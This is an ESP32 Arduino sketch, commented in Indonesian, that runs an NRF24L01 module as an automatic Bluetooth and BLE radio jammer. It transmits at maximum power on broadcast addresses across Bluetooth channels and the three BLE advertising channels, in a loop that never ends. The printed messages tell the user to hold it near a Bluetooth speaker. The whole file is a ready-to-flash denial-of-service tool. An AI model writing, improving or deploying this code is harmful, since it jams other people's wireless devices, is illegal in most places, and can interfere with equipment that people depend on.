

#include <SPI.h>
#include <RF24.h>
#include <esp_wifi.h>
#include <esp_bt.h>

// --- Pin Konfigurasi ---
#define NRF_CE_PIN 4
#define NRF_CSN_PIN 5

// --- Inisialisasi Radio ---
RF24 radio(NRF_CE_PIN, NRF_CSN_PIN);

// --- Variabel Global ---
unsigned long packetCount = 0;
unsigned long lastStats = 0;
unsigned long startTime = 0;

// ========== BLUETOOTH CHANNELS ==========
// Bluetooth Classic channels
const byte bluetooth_channels[] = {
  32, 34, 46, 48, 50, 52,  // channel untuk Bluetooth
  0, 1, 2, 4, 6, 8,        // more channels
  22, 24, 26, 28, 30,       // mid channels
  74, 76, 78, 80            // high channels
};
const int num_bt_channels = sizeof(bluetooth_channels) / sizeof(bluetooth_channels[0]);

// BLE channels - 3 advertising channels
const byte ble_channels[] = {2, 26, 80};
const int num_ble_channels = sizeof(ble_channels) / sizeof(ble_channels[0]);

// Channel grouping untuk aggressive mode
byte channelGroup1[] = {2, 5, 8, 11};     // Group 1
byte channelGroup2[] = {26, 29, 32, 35};  // Group 2
byte channelGroup3[] = {80, 83, 86, 89};  // Group 3

// FIX: Payload 31 karakter + null terminator = 32 byte
char payload[32] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; // 31 'x' + null terminator

// --- Fungsi matikan radio ESP32 ---
void disable_esp_radios() {
  Serial.println("Memulai jamming otomatis...");
  Serial.println("Mematikan radio ESP32...");
  
  esp_wifi_stop();
  esp_wifi_deinit();
  esp_wifi_disconnect();
  
  esp_bt_controller_deinit();
  esp_bt_controller_disable();
  
  delay(100);
  Serial.println("Radio ESP32 dimatikan");
}

// --- Konfigurasi radio untuk jamming MAKSIMUM ---
void configureRadio() {
  Serial.println("Konfigurasi NRF24L01 untuk jamming...");
  
  // Setting PALING OPTIMAL untuk jamming
  radio.setPALevel(RF24_PA_MAX);           // Daya MAKSIMUM
  radio.setDataRate(RF24_2MBPS);           // Kecepatan MAKSIMUM
  radio.setAutoAck(false);                  // No ACK - biar cepet
  radio.setRetries(0, 0);                   // No retry
  radio.setPayloadSize(32);                  // Payload maksimum
  radio.setCRCLength(RF24_CRC_DISABLED);     // No CRC - buang waktu
  radio.setAddressWidth(3);                   // 3 byte address
  
  // Broadcast address - ganggu SEMUA perangkat
  const uint8_t broadcast[3] = {0xFF, 0xFF, 0xFF};
  radio.openWritingPipe(broadcast);
  
  // Buka semua pipe
  for(int i = 0; i < 6; i++) {
    radio.openReadingPipe(i, broadcast);
  }
  
  Serial.println("NRF24L01 siap tempur!");
}

// --- Jamming Bluetooth AGGRESSIVE ---
void jamBluetooth() {
  // Loop semua channel Bluetooth
  for(int i = 0; i < num_bt_channels; i++) {
    radio.setChannel(bluetooth_channels[i]);
    
    // Kirim paket sebanyak mungkin di channel ini
    unsigned long start = micros();
    while(micros() - start < 2000) { // 2ms per channel
      if(radio.writeFast(payload, 32)) {
        packetCount++;
      }
      delayMicroseconds(5);
    }
    radio.flush_tx();
  }
}

// --- Jamming BLE AGGRESSIVE ---
void jamBLE() {
  // Fokus ke 3 BLE advertising channels
  for(int i = 0; i < num_ble_channels; i++) {
    radio.setChannel(ble_channels[i]);
    
    // Kirim lebih lama di BLE channels
    unsigned long start = micros();
    while(micros() - start < 5000) { // 5ms per BLE channel
      if(radio.writeFast(payload, 32)) {
        packetCount++;
      }
      delayMicroseconds(3); // Delay minimal
    }
    radio.flush_tx();
  }
}

// --- Jamming EXTREME - semua channel kena ---
void jamExtreme() {
  const int BURST_SIZE = 100; // Kirim 100x per channel
  
  // Group 1 - channel rendah
  for(int i = 0; i < 4; i++) {
    radio.setChannel(channelGroup1[i]);
    for(int j = 0; j < BURST_SIZE; j++) {
      if(radio.writeFast(payload, 32)) {
        packetCount++;
      }
    }
    radio.txStandBy();
  }
  
  // Group 2 - channel tengah
  for(int i = 0; i < 4; i++) {
    radio.setChannel(channelGroup2[i]);
    for(int j = 0; j < BURST_SIZE; j++) {
      if(radio.writeFast(payload, 32)) {
        packetCount++;
      }
    }
    radio.txStandBy();
  }
  
  // Group 3 - channel tinggi
  for(int i = 0; i < 4; i++) {
    radio.setChannel(channelGroup3[i]);
    for(int j = 0; j < BURST_SIZE; j++) {
      if(radio.writeFast(payload, 32)) {
        packetCount++;
      }
    }
    radio.txStandBy();
  }
  
  // Tambahan - channel BT
  for(int i = 0; i < 5; i++) {
    int randChannel = bluetooth_channels[random(num_bt_channels)];
    radio.setChannel(randChannel);
    for(int j = 0; j < 50; j++) {
      if(radio.writeFast(payload, 32)) {
        packetCount++;
      }
    }
    radio.txStandBy();
  }
}

// --- Setup - langsung start tanpa command ---
void setup() {
  Serial.begin(115200);
  delay(1000);
  
  Serial.println(F("\n╔══════════════════════════════╗"));
  Serial.println(F("║  NRF24L01 Bluetooth Jammer   ║"));
  Serial.println(F("║        AUTO START MODE       ║"));
  Serial.println(F("╚══════════════════════════════╝"));
  Serial.println(F("CE=4, CSN=5"));
  
  // Matikan semua radio ESP32
  disable_esp_radios();
  
  // Set CPU ke 240MHz
  setCpuFrequencyMhz(240);
  
  // Inisialisasi SPI kecepatan maksimum
  SPI.begin();
  SPI.setFrequency(20000000); // 20MHz
  
  // Inisialisasi random
  randomSeed(analogRead(0));
  
  // Inisialisasi radio
  Serial.print(F("Inisialisasi NRF24L01..."));
  if(!radio.begin()) {
    Serial.println(F(" GAGAL!"));
    Serial.println(F("Cek koneksi:"));
    Serial.println(F("- CE=4, CSN=5"));
    Serial.println(F("- VCC=3.3V"));
    Serial.println(F("- GND"));
    while(1) {
      delay(1000);
      Serial.print(F("."));
    }
  }
  Serial.println(F(" OK!"));
  
  // Konfigurasi radio
  configureRadio();
  
  // Catat waktu mulai
  startTime = millis();
  lastStats = millis();
  
  Serial.println(F("\n🔥🔥🔥 JAMMING DIMULAI! 🔥🔥🔥"));
  Serial.println(F("Mode: EXTREME - SEMUA CHANNEL"));
  Serial.println(F("Dekatkan ke speaker Bluetooth!"));
  Serial.println(F("====================================\n"));
}

// --- Loop - jamming terus tanpa henti ---
void loop() {
  // JAMMING EXTREME - gabungan semua teknik
  jamExtreme();      // Channel grouping
  jamBluetooth();    // BT channels  
  jamBLE();          // BLE channels
  
  // Tampilkan statistik setiap 3 detik
  if(millis() - lastStats > 3000) {
    unsigned long uptime = (millis() - startTime) / 1000;
    float pps = packetCount / 3.0;
    
    Serial.print(F("💥 EXTREME JAMMING: "));
    Serial.print((int)pps);
    Serial.print(F(" pps | Total: "));
    Serial.print(packetCount);
    Serial.print(F(" | Uptime: "));
    Serial.print(uptime);
    Serial.println(F(" detik"));
    
    lastStats = millis();
  }
  
  // Reset packetCount kalau terlalu besar (opsional)
  if(packetCount > 10000000) {
    packetCount = 0;
  }
}